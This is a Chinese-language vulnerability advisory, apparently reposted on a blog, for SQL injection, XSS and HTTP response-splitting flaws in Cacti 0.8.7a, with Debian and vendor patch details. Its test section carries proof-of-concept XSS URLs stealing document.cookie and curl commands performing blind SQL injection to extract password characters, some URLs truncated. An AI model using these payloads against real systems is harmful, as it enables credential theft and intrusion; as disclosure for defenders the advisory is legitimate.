Cacti多个输入验证漏洞
Cacti多个输入验证漏洞
发布日期:2008-02-12
更新日期:2008-07-16
受影响系统:
Raxnet
Cacti 0.8.7a
不受影响系统:
Raxnet Cacti
0.8.7b
描述:BUGTRAQ ID: 27749
CVE(CAN) ID:
CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783
Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti中存在多个输入验证错误,允许远程攻击者执行HTTP响应拆分、跨站脚本或SQL注入攻击。
1)
没有正确地过滤对多个参数的输入便用在了SQL查询中,这允许攻击者执行SQL注入攻击。
2)
没有正确地过滤对多个参数的输入便返回给了用户,这允许攻击者向用户浏览器中注入并执行任意HTML和脚本代码,或注入任意HTTP头,而该头会包含在发送给用户的响应中。
<*来源:Francesco
Ongaro (ascii@ush.it)
链接:http://secunia.com/advisories/28872/
http://marc.info/?l=bugtraq%26amp;m=120284658901282%26amp;w=2
http://www.debian.org/security/2008/dsa-1569
*>
测试方法:<font
color='#FF0000'><p align='center'>警
告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>http://www.example.com/cacti/graph.ph ...
6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cacti/graph_vi ...
ouseover=javascript:alert(/XSS/)
http://www.example.com/cacti/index.ph ...
ion=foo/%3Cscript%3Ealert(%26#39;XSS%26#39;)%3C/script%3E
http://www.example.com/cacti/graph_vi ...
0%26#39;1%26#39;=%26#39;1
http://www.example.com/cacti/tree.php ...
eaf_id=1%20or%201%20=%201
curl
"http://www.example.com/cacti/graph_xp ... hp?local_graph_id=1"
-d \
"local_graph_id=1%26#39;" -H "Cookie: Cacti=<cookie
value>"
curl "http://www.example.com/cacti/tree.php?action=edit%26amp;id=1"
-d \
"id=sql%26#39;" -H "Cookie: Cacti=<cookie
value>"
curl -v "http://www.example.com/cacti/index.php/sql.php" -d
\
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"
$
curl -v "http://www.example.com/cacti/index.php/sql.php" -d
\
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"
*
About to connect() to www.example.com port 80 (#0)
* Trying
127.0.0.1... connected
* Connected to www.example.com (127.0.0.1) port
80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php
HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd)
cacalib/3.6.9 OpenTelnet/0.1
> Host: www.example.com
> Accept:
*/*
> Content-Length: 71
> Content-Type:
application/x-www-form-urlencoded
>
<
HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34
GMT
< Server: Apache
< X-Powered-By:
PHP/1.2.3-linuxz
< Content-Length: 355
<
Content-Type: text/html
AAAAAAAAA: SELECT * FROM
user_auth WHERE username = %26#39;foo%26#39;
or
ascii(substring(password,1,1))<56#%26#39; AND password =
md5(%26#39;%26#39;) AND realm=0
Warning:
Cannot modify header information - headers already
sent by
(output started at /home/x/cacti-0.8.7a/auth_login.php:126)
in
/home/x/cacti-0.8.7a/auth_login.php on line 200
*
Connection #0 to host www.example.com left intact
* Closing
connection #0
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d
\
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"
\
| head -n1
HTTP/1.1 200 OK
$ curl
-kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d
\
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"
\
| head -n1
HTTP/1.1 302
Found
<
建议:厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-1569-3)以及相应补丁:
DSA-1569-3:New
cacti packages fix regression
链接:http://www.debian.org/security/2008/dsa-1569
补丁下载:
Source
archives:
http://security.debian.org/pool/updat ...
/cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700
341b5828d95db91f81f5fbba65411d63
http://security.debian.org/pool/updat ...
acti/cacti_0.8.6i-3.5.dsc
Size/MD5 checksum: 581
6184cdfb6a4e7a5372d684556aa46537
http://security.debian.org/pool/updat ...
/cacti_0.8.6i-3.5.diff.gz
Size/MD5 checksum: 37154
dc53c27c1584999db93a83be1bf43879
Architecture
independent packages:
http://security.debian.org/pool/updat ...
/cacti_0.8.6i-3.5_all.deb
Size/MD5 checksum: 958000
f496c887950457535b223bf90988eb72
补丁安装方法:
1.
手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget
url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb
(file是相应的补丁名)
2.
使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
#
apt-get
update
然后,使用下面的命令安装更新软件包:
#
apt-get
upgrade
Raxnet
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cacti.net/release_notes_0_8_7b.php
相关文章
xhyx257
博客统计信息
热门文章
最新评论
友情链接